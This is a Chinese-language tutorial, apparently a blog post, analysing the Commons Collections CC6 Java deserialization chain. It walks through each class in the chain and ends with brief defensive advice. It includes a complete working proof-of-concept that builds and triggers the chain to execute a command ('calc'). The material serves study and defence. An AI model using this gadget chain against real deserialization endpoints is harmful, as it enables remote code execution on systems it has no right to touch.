Java反序列化漏洞利用：CC6链分析<\/h1>

一、CC6链概述<\/h2>
CC6（Commons Collections 6）是Apache Commons Collections库中的一个反序列化利用链，相比CC1链有以下特点：<\/p>
不受JDK版本限制<\/li>
利用点与CC1相同（InvokerTransformer.transform()<\/code>方法执行反射）<\/li>
调用链前半部分与URLDNS链类似，后半部分与CC1类似<\/li>
<\/ul>
二、环境准备<\/h2>

JDK版本：不受限制（与CC1不同）<\/li>
依赖库：Apache Commons Collections<\/li>
恶意代码执行点：InvokerTransformer.transform()<\/code>方法<\/li>
<\/ul>
三、核心组件分析<\/h2>
1. InvokerTransformer<\/h3>
InvokerTransformer<\/code>是执行反射的关键类，其transform()<\/code>方法实现了完整的反射调用：<\/p>
public<\/span> Object transform<\/span>(<\/span>Object input)<\/span> {<\/span>
<\/span><\/span>    if<\/span> (<\/span>input ==<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>        return<\/span> null<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        Class cls =<\/span> input.<\/span>getClass<\/span>();<\/span>
<\/span><\/span>        Method method =<\/span> cls.<\/span>getMethod<\/span>(<\/span>iMethodName,<\/span> iParamTypes);<\/span>
<\/span><\/span>        return<\/span> method.<\/span>invoke<\/span>(<\/span>input,<\/span> iArgs);<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (...)<\/span> {<\/span>
<\/span><\/span>        \/\/ 异常处理
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>利用方式示例：<\/p>
Runtime runtime =<\/span> Runtime.<\/span>getRuntime<\/span>();<\/span>
<\/span><\/span>InvokerTransformer invokerTransformer =<\/span> new<\/span> InvokerTransformer(<\/span>
<\/span><\/span>    "exec"<\/span>,<\/span> 
<\/span><\/span>    new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> 
<\/span><\/span>    new<\/span> Object[]{<\/span>"calc"<\/span>}<\/span>
<\/span><\/span>);<\/span>
<\/span><\/span>invokerTransformer.<\/span>transform<\/span>(<\/span>runtime);<\/span>
<\/span><\/span>\/\/ 等同于 Runtime.getRuntime().exec("calc.exe")
<\/span><\/span><\/span><\/code><\/pre>2. ConstantTransformer<\/h3>
ConstantTransformer<\/code>的transform()<\/code>方法直接返回构造函数传入的对象：<\/p>
public<\/span> Object transform<\/span>(<\/span>Object input)<\/span> {<\/span>
<\/span><\/span>    return<\/span> iConstant;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>用途：由于Runtime<\/code>类未实现Serializable<\/code>接口，不能直接序列化，但可以通过Runtime.class<\/code>（Class对象实现了Serializable<\/code>）来间接引用。<\/p>
3. ChainedTransformer<\/h3>
ChainedTransformer<\/code>将多个Transformer<\/code>串联执行：<\/p>
public<\/span> Object transform<\/span>(<\/span>Object object)<\/span> {<\/span>
<\/span><\/span>    for<\/span> (<\/span>int<\/span> i =<\/span> 0<\/span>;<\/span> i <<\/span> iTransformers.<\/span>length<\/span>;<\/span> i++)<\/span> {<\/span>
<\/span><\/span>        object =<\/span> iTransformers[<\/span>i].<\/span>transform<\/span>(<\/span>object);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    return<\/span> object;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>利用链构造示例：<\/p>
Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> null<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>null<\/span>,<\/span> null<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span>ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span>chainedTransformer.<\/span>transform<\/span>(<\/span>null<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>等效反射代码：<\/p>
Class<?><\/span> runtimeClass =<\/span> Class.<\/span>forName<\/span>(<\/span>"java.lang.Runtime"<\/span>);<\/span>
<\/span><\/span>Method getRuntimeMethod =<\/span> runtimeClass.<\/span>getMethod<\/span>(<\/span>"getRuntime"<\/span>);<\/span>
<\/span><\/span>Object runtimeInstance =<\/span> getRuntimeMethod.<\/span>invoke<\/span>(<\/span>null<\/span>);<\/span>
<\/span><\/span>Method execMethod =<\/span> runtimeClass.<\/span>getMethod<\/span>(<\/span>"exec"<\/span>,<\/span> String.<\/span>class<\/span>);<\/span>
<\/span><\/span>execMethod.<\/span>invoke<\/span>(<\/span>runtimeInstance,<\/span> "notepad.exe"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>四、调用链构造<\/h2>
1. 触发transform方法<\/h3>
通过LazyMap.get()<\/code>方法触发transform<\/code>调用：<\/p>
public<\/span> Object get<\/span>(<\/span>Object key)<\/span> {<\/span>
<\/span><\/span>    if<\/span> (!<\/span>super<\/span>.<\/span>map<\/span>.<\/span>containsKey<\/span>(<\/span>key))<\/span> {<\/span>
<\/span><\/span>        Object value =<\/span> factory.<\/span>transform<\/span>(<\/span>key);<\/span>  \/\/ 关键点
<\/span><\/span><\/span><\/span>        super<\/span>.<\/span>map<\/span>.<\/span>put<\/span>(<\/span>key,<\/span> value);<\/span>
<\/span><\/span>        return<\/span> value;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    return<\/span> super<\/span>.<\/span>map<\/span>.<\/span>get<\/span>(<\/span>key);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>构造方式：<\/p>
Map decorateMap =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>hashmap,<\/span> chainedTransformer);<\/span>
<\/span><\/span>decorateMap.<\/span>get<\/span>(<\/span>null<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>2. 触发get方法<\/h3>
通过TiedMapEntry<\/code>类的getValue()<\/code>方法触发get()<\/code>：<\/p>
public<\/span> Object getValue<\/span>()<\/span> {<\/span>
<\/span><\/span>    return<\/span> map.<\/span>get<\/span>(<\/span>key);<\/span>  \/\/ 调用LazyMap.get()
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>hashCode()<\/code>方法也调用了getValue()<\/code>：<\/p>
public<\/span> int<\/span> hashCode<\/span>()<\/span> {<\/span>
<\/span><\/span>    Object value =<\/span> getValue();<\/span>
<\/span><\/span>    return<\/span> (<\/span>getKey()<\/span> ==<\/span> null<\/span> ?<\/span> 0<\/span> :<\/span> getKey().<\/span>hashCode<\/span>())<\/span> ^<\/span>
<\/span><\/span>           (<\/span>value ==<\/span> null<\/span> ?<\/span> 0<\/span> :<\/span> value.<\/span>hashCode<\/span>());<\/span> 
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3. 触发hashCode方法<\/h3>
通过HashMap.readObject()<\/code>触发hashCode()<\/code>：<\/p>

HashMap.readObject()<\/code> → hash()<\/code> → hashCode()<\/code><\/li>
<\/ul>
五、完整利用链构造<\/h2>
为避免序列化时立即执行命令，需要分步构造：<\/p>
public<\/span> class<\/span> Poc<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        \/\/ 1. 构造恶意Transformer数组
<\/span><\/span><\/span><\/span>        Transformer[]<\/span> transformers =<\/span> {<\/span>
<\/span><\/span>            new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>            new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> 
<\/span><\/span>                new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>                new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> new<\/span> Class[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>            new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> 
<\/span><\/span>                new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>                new<\/span> Object[]{<\/span>null<\/span>,<\/span> null<\/span>}),<\/span>
<\/span><\/span>            new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> 
<\/span><\/span>                new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> 
<\/span><\/span>                new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span>
<\/span><\/span>        };<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 2. 创建ChainedTransformer但不立即使用
<\/span><\/span><\/span><\/span>        ChainedTransformer ct =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 3. 使用无害的Transformer初始化LazyMap
<\/span><\/span><\/span><\/span>        Map lazymap =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>new<\/span> HashMap(),<\/span> new<\/span> ConstantTransformer(<\/span>1<\/span>));<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 4. 创建TiedMapEntry并放入HashMap
<\/span><\/span><\/span><\/span>        TiedMapEntry tiedMapEntry =<\/span> new<\/span> TiedMapEntry(<\/span>lazymap,<\/span> "2"<\/span>);<\/span>
<\/span><\/span>        HashMap<<\/span>Object,<\/span> Object><\/span> hashMap =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>        hashMap.<\/span>put<\/span>(<\/span>tiedMapEntry,<\/span> "3"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 5. 移除可能触发执行的键
<\/span><\/span><\/span><\/span>        lazymap.<\/span>remove<\/span>(<\/span>"2"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 6. 通过反射替换为恶意Transformer
<\/span><\/span><\/span><\/span>        Field factoryField =<\/span> LazyMap.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"factory"<\/span>);<\/span>
<\/span><\/span>        factoryField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        factoryField.<\/span>set<\/span>(<\/span>lazymap,<\/span> ct);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 7. 序列化和反序列化触发漏洞
<\/span><\/span><\/span><\/span>        serial(<\/span>hashMap);<\/span>
<\/span><\/span>        unserial();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> void<\/span> serial<\/span>(<\/span>Object obj)<\/span> throws<\/span> IOException {<\/span>
<\/span><\/span>        ObjectOutputStream out =<\/span> new<\/span> ObjectOutputStream(<\/span>new<\/span> FileOutputStream(<\/span>"cc6.bin"<\/span>));<\/span>
<\/span><\/span>        out.<\/span>writeObject<\/span>(<\/span>obj);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> void<\/span> unserial<\/span>()<\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span>
<\/span><\/span>        ObjectInputStream in =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> FileInputStream(<\/span>"cc6.bin"<\/span>));<\/span>
<\/span><\/span>        in.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>六、调用链总结<\/h2>
完整调用链如下：<\/p>

HashMap.readObject()<\/code>

→ hash()<\/code>

→ TiedMapEntry.hashCode()<\/code>

→ TiedMapEntry.getValue()<\/code>

→ LazyMap.get()<\/code>

→ ChainedTransformer.transform()<\/code>

→ InvokerTransformer.transform()<\/code>（执行恶意代码）<\/li>
<\/ol>
七、防御措施<\/h2>

升级Apache Commons Collections到最新安全版本<\/li>
使用Java反序列化过滤器（JEP 290）<\/li>
避免反序列化不可信数据<\/li>
使用白名单机制验证反序列化的类<\/li>
<\/ol>
八、关键点总结<\/h2>

不受JDK版本限制<\/strong>：相比CC1更具通用性<\/li>
延迟触发机制<\/strong>：通过反射修改字段避免序列化时立即执行<\/li>
链式调用<\/strong>：结合URLDNS和CC1的调用链特点<\/li>
Transformer利用<\/strong>：通过ChainedTransformer串联多个反射操作<\/li>
入口点<\/strong>：HashMap的反序列化作为起始点<\/li>
<\/ol>